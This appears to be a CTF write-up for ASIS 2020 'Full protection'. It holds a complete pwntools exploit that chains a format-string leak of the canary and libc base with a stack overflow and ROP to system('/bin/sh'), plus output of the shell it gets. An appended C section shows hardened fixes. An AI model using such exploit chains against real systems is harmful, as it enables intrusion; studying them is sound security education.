
[ASIS CTF Quals 2020] Full protection

ch4rli3kop 2020. 7. 12. 18:37

Full protection

Name : ChanHee Park

Summary : format string bug (fsb) leak of a stack address, a libc pointer and the stack canary, then a stack buffer overflow (bof) into a ROP chain that calls system("/bin/sh")

Exploit

#!/usr/bin/python
# Exploit for ASIS CTF Quals 2020 "Full protection": a format string bug
# leaks a stack address, a libc pointer and the stack canary; a stack buffer
# overflow then rewrites the return address with a ROP chain that calls
# system("/bin/sh"). All offsets below are for the provided libc-2.27.so.
# Byte literals are used so the script runs under both Python 2 and 3.
from pwn import *

r = process('./chall', env={'LD_PRELOAD':'libc-2.27.so'})
lib = ELF('./libc-2.27.so')
#context.log_level = 'debug'
#gdb.attach(r)

# Stage 1: format string leak. 21 "%p" conversions print the register
# arguments and the following stack words in hex, separated by dots.
r.sendline(b'%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p')
_leak = r.recvline().split(b'.')
print(_leak)
_stack = int(_leak[0], 16)               # a stack address
_libc = int(_leak[2], 16) - 0x3ed8c0     # libc pointer minus its offset in libc-2.27.so = libc base
_canary = int(_leak[13], 16)             # stack canary (its low byte is always 0x00)

log.info('stack = ' + hex(_stack))
success('libc = ' + hex(_libc))
success('canary = ' + hex(_canary))

# Gadgets and symbols as offsets from the libc base (libc-2.27.so).
# 0x00000000000221a3 : pop rdi ; pop rbp ; ret
_poprdiret = _libc + 0x000000000002155f # pop rdi ; ret (defined but not used below)
_ppr = _libc + 0x000221a3               # pop rdi ; pop rbp ; ret
_binsh = _libc + 0x1b40fa               # address of the "/bin/sh" string
_system = _libc + 0x4f4e0               # system()

# Stage 2: overflow. Fill the 0x48-byte buffer, put the leaked canary back so
# the stack protector check passes, overwrite saved rbp, then return into the
# ROP chain: pop rdi <- "/bin/sh", pop rbp <- junk, ret -> system.
payload = b'\x00'                  # leading NUL byte
payload += b'A' * (0x48-1)         # rest of the buffer
payload += p64(_canary)            # canary, unchanged
payload += b'B'*8                  # saved rbp
payload += p64(_ppr)               # return address -> pop rdi ; pop rbp ; ret
payload += p64(_binsh)             # rdi = "/bin/sh"
payload += b'B'*8                  # rbp = junk
payload += p64(_system)            # ret -> system("/bin/sh")
r.sendline(payload)

r.interactive()

Result

ch4rli3kop at ubuntu in ~/Desktop/asis2020/proctection
$ python sol_proc.py
[+] Starting local process './chall': pid 9552
[*] '/home/ch4rli3kop/Desktop/asis2020/proctection/libc-2.27.so'
   Arch:     amd64-64-little
   RELRO:    Partial RELRO
   Stack:    Canary found
   NX:       NX enabled
   PIE:      PIE enabled
['0x7ffd1a7a7a90', '0x10', '0x7fd4e2bad8c0', '0x7fd4e2dbb540', '0x70252e70252e7025', '0x252e70252e70252e', '0x2e70252e70252e70', '0x70252e70252e7025', '0x252e70252e70252e', '0x2e70252e70252e70', '0x70252e70252e7025', '0x70252e70252e', '0x7ffd1a7a7bc0', '0x1225d781d0057500', '(nil)', '0x7fd4e27e1b97', '0x1', '0x7ffd1a7a7bc8', '0x100008000', '0x55baf7d0d850', '(nil)\n']
[*] stack = 0x7ffd1a7a7a90
[+] libc = 0x7fd4e27c0000
[+] canary = 0x1225d781d0057500
[*] Switching to interactive mode
$ id
uid=1000(ch4rli3kop) gid=1000(ch4rli3kop) groups=1000(ch4rli3kop),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)
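The exploit above chains two classic bugs: user input used as a printf format string (the leak) and an unbounded read into a 0x48-byte stack buffer (the overflow). The challenge's source is not on the page, so the following is an added, constructed C example of my own, not the challenge binary: each weak pattern is shown disabled beside a hardened form, and two check functions confirm that "%p" tokens come back as plain text and that oversized input is cut at the buffer size. BUF_SIZE is taken from the 0x48 padding in the exploit; every function name here is hypothetical.

```c
/* Added example: the two bug classes from the write-up, with hardened forms.
 * Constructed code, not the challenge's source. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x48   /* same size as the buffer the exploit pads before the canary */

/* Bug 1 (format string): printf(buf) treats user bytes as the format, so each
 * "%p" prints a register or stack word, which is how the write-up reads a
 * stack address, a libc pointer and the canary. Disabled, shown for contrast. */
#if 0
static void echo_weak(const char *buf) { printf(buf); }
#endif

/* Fix 1: the format is a literal and the user data is an argument to "%s".
 * The result goes to out so it can be checked without printing. */
static void echo_hardened(const char *buf, char *out, size_t out_len) {
    snprintf(out, out_len, "%s", buf);
}

/* Bug 2 (stack overflow): an unbounded read into a fixed buffer lets input
 * run over the canary, saved rbp and return address. Disabled, for contrast. */
#if 0
static void read_weak(char *buf) { gets(buf); }
#endif

/* Fix 2: copy at most dst_len - 1 bytes and always NUL-terminate.
 * Returns the number of bytes stored (excluding the terminator). */
static size_t read_hardened(const char *src, char *dst, size_t dst_len) {
    size_t n = 0;
    while (n < dst_len - 1 && src[n] != '\0')
        n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Check 1: a "%p.%p.%p" input comes back verbatim instead of as leaked words. */
int format_tokens_are_inert(void) {
    char out[64];
    echo_hardened("%p.%p.%p", out, sizeof out);
    return strcmp(out, "%p.%p.%p") == 0;
}

/* Check 2: input longer than the buffer (the exploit sends 0x48 + 8 + 8 + 32
 * bytes) is cut at BUF_SIZE - 1 and the buffer stays NUL-terminated. */
int oversized_input_is_truncated(void) {
    char big[200];
    char buf[BUF_SIZE];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    size_t n = read_hardened(big, buf, sizeof buf);
    return n == BUF_SIZE - 1 && buf[BUF_SIZE - 1] == '\0' && strlen(buf) == BUF_SIZE - 1;
}

int main(void) {
    printf("format tokens inert: %d\n", format_tokens_are_inert());
    printf("oversized input truncated: %d\n", oversized_input_is_truncated());
    return 0;
}
```

Building with `gcc -Wformat -Werror=format-security` turns the disabled `printf(buf)` pattern into a compile error if it is ever re-enabled, which is a cheap way to keep the leak primitive out of a codebase; the bounded copy removes the overflow that the leaked canary was needed for in the first place.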

